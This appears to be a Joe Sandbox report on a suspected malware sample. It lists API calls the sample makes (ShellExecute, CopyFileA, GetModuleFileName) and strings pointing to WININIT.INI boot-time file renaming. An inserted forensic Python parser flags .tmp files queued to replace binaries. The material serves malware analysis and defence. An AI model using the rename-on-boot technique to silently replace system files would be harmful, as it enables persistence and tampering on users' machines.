                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 01c8de7d1c52f1379436ba32370cb002541e89dbe2850501a5063f81bbc03de1
                                                                                    • Instruction ID: 18b38d09955f91067994ce57c2704c259faaba03eea283e8c2a7273f2993d898
                                                                                    • Opcode Fuzzy Hash: 01c8de7d1c52f1379436ba32370cb002541e89dbe2850501a5063f81bbc03de1
                                                                                    • Instruction Fuzzy Hash: E97132716043104BD315DF69C984B16BBD8AFC5315F1482BFE984AB3D2C7B8C901CB89
                                                                                    APIs
                                                                                    • GetCapture.USER32 ref: 005A2BA2
                                                                                    • IsWindowUnicode.USER32(00000000), ref: 005A2BE5
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C00
                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C1F
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005A2C2E
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005A2C3F
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C5F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1994056952-0
                                                                                    • Opcode ID: 79780fc3bec1803b35e57a68d2ec923f4b549fb1d4fc9166e9bf7d30cdcaf988
                                                                                    • Instruction ID: 4dfba5f3d1d218beddb166fd502ba4ee7a64a30cf6ddade1315904ca74e7163d
                                                                                    • Opcode Fuzzy Hash: 79780fc3bec1803b35e57a68d2ec923f4b549fb1d4fc9166e9bf7d30cdcaf988
                                                                                    • Instruction Fuzzy Hash: 51219CB12046096FA620FA5DCA82FAF77DCEF06724F10842AF959C3242EA54FC509774
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68bf383cb7f79b99f340bdf26841dbaafbf7dd31d34f85d7c5e7cd938e48f808
                                                                                    • Instruction ID: 291e5d107d462672790c1edf6ff7d0cc3542d77857f31f2adbac887a00927ee5
                                                                                    • Opcode Fuzzy Hash: 68bf383cb7f79b99f340bdf26841dbaafbf7dd31d34f85d7c5e7cd938e48f808
                                                                                    • Instruction Fuzzy Hash: 17C117A2B102010BD714AE7DDC8476EBA999BC5316F18827FF214EB3D6DA7CDD058348
                                                                                    APIs
                                                                                      • Part of subcall function 00CE5727: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CE575A
                                                                                      • Part of subcall function 00CE56D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CE56F5
                                                                                    • _Smanip.LIBCPMTD ref: 00CE5AE1
                                                                                    • _Smanip.LIBCPMTD ref: 00CE5B7B
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00CE5CB8
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CE5CD4
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CE5CE1
                                                                                    • CopyFileA.KERNEL32(00000000,?,00000000), ref: 00CE5D4A
                                                                                    • ShellExecuteA.SHELL32(00000000,100185D4,?,00000000,00000000,00000001), ref: 00CE5D70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2489516046-0
                                                                                    • Opcode ID: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                    • Instruction ID: 5daa8f7e598b8f653a0ed2fd0d351a9f883ee7e4e463d4acc5aa280caedce6ee
                                                                                    • Opcode Fuzzy Hash: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                    • Instruction Fuzzy Hash: B8024270D083D8DEEB11DBA4C859BDDBFB16F25304F0441D9D1496B282DBBA1B88DB62
                                                                                    APIs
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F8FDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
                                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                    • API String ID: 390214022-3304407042
                                                                                    • Opcode ID: 72d01abfe8e5969de7e26bb812fea71a54af99fa0a185ea00ff7a95313d2a991
                                                                                    • Instruction ID: 2223d5580d9881282453f8846468d4fa0c2eade89701c8d1d1552e55bc4b479c
                                                                                    • Opcode Fuzzy Hash: 72d01abfe8e5969de7e26bb812fea71a54af99fa0a185ea00ff7a95313d2a991
                                                                                    • Instruction Fuzzy Hash: A6811E34A0060DAFDF10EBA4C986BEEBBB5FF88304F504465E600B7291DB79AE45CB55
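The strings ".tmp", "MoveFileEx", "NUL", "WININIT.INI" and "[rename]" next to WritePrivateProfileStringW identify the legacy delete-or-replace-on-reboot path: where MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT is unavailable, a `[rename]` entry of the form `destination=source` is written to WININIT.INI, and a destination of `NUL` deletes the source at the next boot. The parser below is an added forensic example for this report, not code from the sample or from Joe Sandbox; the INI text it parses is constructed, and the "binary replaced by a .tmp" triage rule is a heuristic chosen here, not something the report states.

```python
from __future__ import annotations

from dataclasses import dataclass

BINARY_EXTENSIONS = (".exe", ".dll", ".sys", ".ocx")


@dataclass(frozen=True)
class PendingOp:
    """One boot-time file operation queued in WININIT.INI."""
    action: str          # "delete" or "rename"
    source: str
    destination: str | None


def parse_wininit_rename(text: str) -> list[PendingOp]:
    """Parse the [rename] section of WININIT.INI.

    Lines are 'destination=source'; 'NUL=source' means delete at next boot.
    Sections other than [rename], blank lines and ';' comments are ignored.
    """
    ops: list[PendingOp] = []
    in_rename = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_rename = line[1:-1].strip().lower() == "rename"
            continue
        if not in_rename or "=" not in line:
            continue
        dest, src = (part.strip() for part in line.split("=", 1))
        if dest.upper() == "NUL":
            ops.append(PendingOp("delete", src, None))
        else:
            ops.append(PendingOp("rename", src, dest))
    return ops


def replaces_binary(op: PendingOp) -> bool:
    """Triage heuristic (assumption, not from the report): a rename that drops a .tmp
    file over an executable, DLL, driver or OCX at boot is the pattern worth pulling
    the source file for."""
    return (op.action == "rename"
            and op.source.lower().endswith(".tmp")
            and op.destination is not None
            and op.destination.lower().endswith(BINARY_EXTENSIONS))


# Constructed WININIT.INI content for illustration; paths are hypothetical.
SAMPLE_INI = r"""
; written by an installer or by a dropper using the legacy rename mechanism
[rename]
NUL=C:\TEMP\INSTALL.TMP
C:\WINDOWS\SYSTEM\UPDATE.DLL=C:\TEMP\UPDATE.TMP
[other]
key=value
"""

if __name__ == "__main__":
    for op in parse_wininit_rename(SAMPLE_INI):
        flag = "  <-- binary replaced from .tmp" if replaces_binary(op) else ""
        print(op.action, op.source, "->", op.destination or "(deleted)", flag)
```

On NT-based Windows the same queue lives in the REG_MULTI_SZ value `PendingFileRenameOperations` under `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager`, so an investigator checks both; the sample's function is the WININIT.INI fallback only.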
                                                                                    APIs
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CF2
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CFF
                                                                                    • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011D0A
                                                                                    • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10011D17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 623893373-0
APIs
  • Part of subcall function 00407828: GetCurrentThreadId.KERNEL32 ref: 0040782B
• GetTickCount.KERNEL32 ref: 0040739F
• GetTickCount.KERNEL32 ref: 004073B7
• GetCurrentThreadId.KERNEL32 ref: 004073E6
• GetTickCount.KERNEL32 ref: 00407411
• GetTickCount.KERNEL32 ref: 00407448
• GetTickCount.KERNEL32 ref: 00407472
• GetCurrentThreadId.KERNEL32 ref: 004074E2
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: CountTick$CurrentThread
• String ID:
• API String ID: 3968769311-0
APIs
• ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 10011B98
• ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011BB8
• _Min_value.LIBCPMTD ref: 10011BCF
• ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10011BE3
• ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011C0F
• fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 10011C4D
• fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 10011C9E
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
• String ID:
• API String ID: 1591557727-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005A2DF0
• IsWindowUnicode.USER32 ref: 005A2E04
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005A2E27
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005A2E3D
• TranslateMessage.USER32 ref: 005A2EC2
• DispatchMessageW.USER32 ref: 005A2ECF
• DispatchMessageA.USER32 ref: 005A2ED7
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
• String ID:
• API String ID: 2190272339-0
APIs
• GetActiveWindow.USER32 ref: 005B285F
• GetFocus.USER32 ref: 005B2867
• RegisterClassW.USER32(00661834), ref: 005B2888
• ShowWindow.USER32(00000000,00000008,00000000,00400000,00000000,41146400,00000000,00000000,00000000,00000000,80000000,00000000,00400000,00000000,00000000,00000000), ref: 005B2920
• SetFocus.USER32(00000000,00000000,005B2942,?,?,?,00000001,00000000,?,00619EC3,0066978C,?,00650D35,?,?,00000000), ref: 005B2927
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: FocusWindow$ActiveClassRegisterShow
• String ID: TWindowDisabler-Window
• API String ID: 495420250-1824977358
APIs
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: dllmain_raw$Main@12dllmain_crt_dispatch
• String ID:
• API String ID: 3353612457-0
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DBEC
• GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC05
• CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC2F
• CloseHandle.KERNEL32(00000000), ref: 0063DC4D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: FileHandle$AttributesCloseCreateModule
• String ID: GetFinalPathNameByHandleW$kernel32.dll
• API String ID: 791737717-340263132
APIs
• GetDC.USER32(00000000), ref: 005B8F29
  • Part of subcall function 004DD0C0: EnterCriticalSection.KERNEL32(?,00000000,004DD32F,?,?), ref: 004DD108
• SelectObject.GDI32(006125F0,00000000), ref: 005B8F4B
• GetTextExtentPointW.GDI32(006125F0,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005B8F5F
• GetTextMetricsW.GDI32(006125F0,?), ref: 005B8F81
• ReleaseDC.USER32(00000000,006125F0), ref: 005B8F9E
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005B8F56
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 1334710084-222967699
                                                                                    • Opcode ID: 958775d07e3e9b45620c2f21b6b018f80563130afb076ad44b94cc2abff4fe22
                                                                                    • Instruction ID: 51f75fe6070d711ca219fc08ac8bc05be8c07b0fd7becc7a938aa07a23ceff98
                                                                                    • Opcode Fuzzy Hash: 958775d07e3e9b45620c2f21b6b018f80563130afb076ad44b94cc2abff4fe22
                                                                                    • Instruction Fuzzy Hash: 28016D76B14608AFDB01DBE9CD41EEEB7BDEB49714F500466BA00D3281DAB8AD10C764
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083E9
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083EF
• GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 0040840A
• WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 00408410
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: FileHandleWrite
• String ID: Error$Runtime error at 00000000
• API String ID: 3320372497-2970929446
• Opcode ID: 92e6fdd24f1f60eb182b72c0aadb941e414bd13305f3c1d9f226be0fde595ab1
• Instruction ID: 8a17602c2e75a12023cfcc5c7f70c251d3057b547bf485000fb7f9983d30ebe3
• Opcode Fuzzy Hash: 92e6fdd24f1f60eb182b72c0aadb941e414bd13305f3c1d9f226be0fde595ab1
• Instruction Fuzzy Hash: 1AF046B0640341B9E720BB616D07F1A3A4D4740F26F00053FF550B93C2DEFA4A88836D
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0042CBBD
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0042CBD9
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0042CC12
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0042CC8F
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0042CCA8
• VariantCopy.OLEAUT32(?,?), ref: 0042CCE3
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
